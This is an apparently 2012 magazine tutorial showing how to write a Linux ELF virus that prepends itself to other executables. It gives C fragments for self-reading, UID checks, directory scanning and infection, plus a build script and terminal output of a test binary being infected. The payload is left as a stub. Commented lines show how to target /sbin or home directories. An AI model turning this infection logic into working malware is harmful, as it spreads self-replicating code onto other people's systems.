ELF Virus, Part I

Himanshu Arora

Issue #213, January 2012

How to create a simple Linux ELF virus that can infect and propagate through other ELF executables.

The history of computer viruses dates back to 1949 when Mr John von Neumann, a lecturer at the University of Illinois, wrote a paper: “Theory of self-reproducing automata”. That was just a research work, but since then, computer viruses have evolved dramatically. Apart from early systems, the Microsoft Windows OS has been a primary target for computer virus developers. Whether this is due to the number of people using that OS or the number of loop holes it carries, the debate still remains open. For the past two decades, the popularity of the Linux OS has grown in leaps and bounds with more and more Web server machines running on Linux. Using Linux on a PC or laptop is a growing trend. Linux's growing popularity poses the new threat of it being vulnerable to virus attacks. Although the success of existing Linux viruses has been limited, the threat still remains.

In this article, I discuss a particular category of Linux viruses known as ELF viruses, but before doing that, first let me introduce some basics that should help you understand the rest of the article.

What Is ELF?

ELF stands for Executable and Linkable Format. It is a standard file format for object files, executables, shared libraries and core dumps. It became a standard binary file format for UNIX (and UNIX-like systems) in 1999.

An ELF file begins with an ELF header, which is represented as the following structure:

#define EI_NIDENT       16
typedef struct {
          unsigned char e_ident[EI_NIDENT];
          Elf32_Half    e_type;
          Elf32_Half    e_machine;
          Elf32_Word    e_version;
          Elf32_Addr    e_entry;
          Elf32_Off     e_phoff;
          Elf32_Off     e_shoff;
          Elf32_Word    e_flags;
          Elf32_Half    e_ehsize;
          Elf32_Half    e_phentsize;
          Elf32_Half    e_phnum;
          Elf32_Half    e_shentsize;
          Elf32_Half    e_shnum;
          Elf32_Half    e_shstrndx;
 } Elf32_Ehdr;

Here is the description of some of the basic elements in the structure above:

1) e_ident: ELF has capabilities to support multiple processors, data encodings, classes of machines and so forth. Now, to support all this, the ELF header includes some initial bytes that specify how to interpret the file independent of the file's contents and the processor on which the query is made. The e_ident[] array in the previous structure corresponds to these initial bytes. The following is the breakdown of the e_ident[] array:

Name                 Value      Purpose

EI_MAG0                 0   File identification
EI_MAG1                 1   File identification
EI_MAG2                 2   File identification
EI_MAG3                 3   File identification
EI_CLASS                4   File class
EI_DATA                 5   Data encoding
EI_VERSION              6   File version
EI_PAD                  7   Start of padding bytes
EI_NIDENT              16   Size of e_ident[]

EI_MAG0 to EI_MAG3 hold a magic number consisting of the following four bytes:

'0x7f', 'E', 'L', 'F'

These four magical bytes help identify whether a file is of the ELF type or not.

2) e_type: this value helps identify the type of ELF file:

Name          Value    Meaning
                   
ET_NONE          0    No file type
ET_REL           1    Relocatable file
ET_EXEC          2    Executable file
ET_DYN           3    Shared object file
ET_CORE          4    Core file
ET_LOPROC   0xff00    Processor-specific
ET_HIPROC   0xffff    Processor-specific

3) e_machine: this value helps identify the architecture for an ELF file:


Name          Value    Meaning                    
ET_NONE          0   No machine
EM_M32           1   AT&T WE 32100
EM_SPARC         2   SPARC
EM_386           3   Intel Architecture
EM_68K           4   Motorola 68000
EM_88K           5   Motorola 88000
EM_860           7   Intel 80860
EM_MIPS          8   MIPS RS3000 Big-Endian
EM_MIPS_RS4_BE   10  MIPS RS4000 Big-Endian
RESERVED       11-16 Reserved for future use

4) e_version: this value is used to identify the version of the object file:

Name       Value    Meaning
EV_NONE      0    Invalid version
EV_CURRENT   1    Current version

The value 1 signifies the original file format; extensions will create new versions with higher numbers.

What Is an ELF Virus?

An ELF virus is a malicious piece of code that mainly targets ELF executables and infects them in such a way that after being infected, either these executables start behaving abnormally or carry out some things that are invisible to the user. Most of the time, it's the latter of the two characteristics (as mentioned earlier) that is prominent in infected ELF executables, the most common being the invisible propagation of the virus to fresh executables each time an infected executable is run. Now you can easily understand that if an ELF virus somehow gains root access to a system, it can cause havoc.

Types of ELF Viruses

Most ELF viruses are based on the Silvio Cesare File Virus. These can be divided into two categories:

  1. A malicious piece of code that simply prepends itself to the start of innocent executables.

  2. A malicious piece of code that is injected into the text or data segment of innocent executables.

In this article, I focus on type 1 ELF viruses.

The Virus: Explained

This virus, as mentioned previously, consists of a malicious piece of code that prepends itself to the start of other executables. Now, because it completely prepends itself to the start of other executables, so that it propagates completely, it leaves the least dependency on its source of origin. This way, the virus creates its own copy in all the executables it infects.

This increases the life of the virus, because it would become very hard to find all the executables that are infected until you know the infection mechanism of the malicious code. Further, even if the source of the virus is deleted, the virus propagation does not stop until all the infected executables are cleaned/deleted.

Note: this virus would provide the propagation mechanism (that is, how it infects the executable to propagate), but it would refrain from showing its heart (that is, the piece of code that actually does something wrong with the infected executable or the system as a whole). This is because I don't want to encourage any newbie to directly copy and paste the virus and use it in any destructive way.

The following is a brief description of how the virus works.

When run for the very first time or run from an infected executable, here is what happens:

1) As a very first step, it copies itself into memory. This is required, as the virus would like to prepend itself to any ELF executable it encounters. One important thing to note here is the size of the virus' compiled code. This size is required in the code so as to read itself into memory. I have defined a macro VIRUS_SIZE as a symbolic constant for the size of the virus.

The following code reads the virus into the memory:

if (read(fd1, virus, VIRUS_SIZE) != VIRUS_SIZE) 
{
    printf("\n read() failed \n");
    return 1;
}

One concern here is that if someone changes/adds/removes some code in the original source in a way that the size of the compiled binary changes. In that case, either manually change the value of the macro VIRUS_SIZE and make it equal to the value spit out by the command ls -l <name of the binary>, or write a script that does this automatically every time for you.

2) In the second step, the virus determines the effective user ID of the user that has run this virus. This lets the logic determine whether the virus was run by root or any other user. Based on this information, the code decides which paths to search for ELF executables. The following line in the code determines the effective user ID:

uid = geteuid();

3) In the third step, if the effective UID is that of root user, it starts scanning the system directories (hard-coded in the code) where there could be potential ELF executables present. If the effective UID is that of any other user, the code starts scanning the user's login directory for any vulnerable ELF executables:


if(uid == 0) 
{
    /* Ohh...root powers...*/

    /* Add more system directories that contain important binaries*/
    //if(infections < MAX_INFECT) searchForELF("/sbin", virus); 
    //infecting system paths like these can cause havoc.... :-) 
     
    if(infections < MAX_INFECT)
        searchForELF("/home/himanshu/practice/elfvirus/filetoinfect",
virus); // added my own directory as I wanted only select files 
to be infected.
       
    launch_attack();
} 
else 
{
    /* The next two (commented) lines find the user's login directory
       and try to infect all the ELF executables it can */

    // info=*getpwuid(uid);       
    // if(infections < MAX_INFECT) searchForELF(info.pw_dir, virus);

    if(infections < MAX_INFECT)
        searchForELF("/home/himanshu/practice/elfvirus/filetoinfect",
virus); // added my own directory as I wanted only select files 
to be infected.
}

4) In the fourth step, the code checks for any valid ELF by checking its header. It checks the executable for things like it should be an ELF type, it should be for the architecture that the virus itself is compiled from, it should not be a core dump file and so on:


if(hdr.e_ident[0] != ELFMAG0 || hdr.e_ident[1] != ELFMAG1 ||
hdr.e_ident[2] != ELFMAG2 ||hdr.e_ident[3] != ELFMAG3) 
{
    printf("\n Not an ELF file \n");
    return -1;
}

if (hdr.e_type != ET_EXEC && hdr.e_type != ET_DYN)
{
    printf("\n Seems to be a core dump, skipping... \n");
    return -1;
}

5) Once the ELF is verified by the code that it is a valid ELF that can be infected, then:

  • The code creates a temporary file and writes the buffer (compiled virus) that was copied in first step (step 1 above) to the temporary file created.

  • Reads the executable that is to be infected in memory and appends it to the temporary file (created above).

  • Appends a magic number (to signify that the executable is infected) at the end of this temporary file.

  • Changes the name of temp file so that it replaces the original innocent executable file.

So, in this step, the virus makes its first propagation to an executable.

6) In the sixth step, if the virus was executed as root, it launches its most dangerous piece of code—the payload through which destruction can be done. As I have explained previously, this is a dummy function launch_attack() in the code being discussed here, as I do not want to promote copy-paste-execute behavior.

Now whenever this infected executable is launched, the virus follows all these six steps again for infecting and propagating to other executables.

If the virus is being executed from an infected executable, then after all the six steps described above, there has to be way that the infected executable that is launched should do its work correctly so that the user doesn't even have an idea of what happened behind the scenes. So in this case, the following steps (7–9) occur.

7) In the seventh step, from the start of the executable, a seek to the end of virus code (that is, a seek equivalent to VIRUS_SIZE) is done. From here, all the bytes are copied (this would be compiled code of the actual executable) and written to a temporary file.

8) In the eighth step, the code forks a new process, executes this temporary file and after execution, deletes the temporary file.

9) The user sees only that he or she executed a binary and that it executed fine.

Note: I have added some log statements to signify that the target executable is infected.

Note: in the code in Listing 1, just change the path /home/himanshu/practice/elfvirus/filetoinfect to the path where some executables (that you want to infect) are kept in your machine.

Compiling the Virus

As I already mentioned, the value of the VIRUS_SIZE macro should be equal to the size of the compiled code. Here is a script that will automate the procedure:

#!/bin/sh
gcc -o elfvirus elfvirus.c
FILESIZE=`ls -l elfvirus|awk '$5 {print $5}'`
PROGSIZE=`awk '/define VIRUS_SIZE/ {print $3}' elfvirus.c`
if [ $FILESIZE -eq $PROGSIZE ];then
        echo File sizes are correct...Ready to Roll!
else
        echo File size do not match!
        echo "Modifying source defines to VIRUS_SIZE $FILESIZE."
        awk ' {if(/define VIRUS_SIZE/) print "#define VIRUS_SIZE
"'$FILESIZE'; else print $0}' elfvirus.c > elfvirus.c.new
        mv elfvirus.c elfvirus.c.bak
        mv elfvirus.c.new elfvirus.c
        ./create
fi

Simply run the above script to compile the virus code.

Output

I created a “hello world” executable in the directory where this virus searches for executables to infect. The following is a capture from my machine:

himanshu@himanshu-laptop ~/practice/elfvirus/filetoinfect $ gcc -Wall
hello.c -o hello
himanshu@himanshu-laptop ~/practice/elfvirus/filetoinfect $ ./hello

 Hello World

As you can see, the ELF executable hello, when run, outputs “Hello World”.

Now, I run the virus code:

himanshu@himanshu-laptop ~/practice/elfvirus $ ./elfvirus 

 Inside main 

 Inside searchForELF 

 Found ==> [/home/himanshu/practice/elfvirus/filetoinfect/..] 
 It is a directory

 Found ==> [/home/himanshu/practice/elfvirus/filetoinfect/.] 
 It is a directory

 Found ==> [/home/himanshu/practice/elfvirus/filetoinfect/hello] 

 Inside infect 
***Infected /home/himanshu/practice/elfvirus/filetoinfect/hello.

 Virus executed from source and not from any infected executable. Exiting
gracefully

The log statements said that the virus successfully infected /home/himanshu/practice/elfvirus/filetoinfect/hello. Now, when I again execute hello, kept at the same path, I see:

himanshu@himanshu-laptop ~/practice/elfvirus/filetoinfect $ ./hello

 Inside main 

 Inside searchForELF 

 Found ==> [/home/himanshu/practice/elfvirus/filetoinfect/..] 
 It is a directory

 Found ==> [/home/himanshu/practice/elfvirus/filetoinfect/.] 
 It is a directory

 Found ==> [/home/himanshu/practice/elfvirus/filetoinfect/hello] 

 Could not open [/home/himanshu/practice/elfvirus/filetoinfect/hello]

 Virus executed by an infected executable. Launching the executable now.

 Hello World

So, it is clear from the above output that the virus has infected the executable hello, which, when run now, will try to infect other executables in the path mentioned in source code of the virus.

Conclusion

This article explains a basic ELF virus that prepends itself before other executables and infects them. This article is first in its series. My next article will show how to infect ELF by injecting code into text or a data segment.

Himanshu Arora has been working as a software developer for the past four years. His Favorite language is C. He writes technical articles for many Web sites and loves adventure journeys with friends.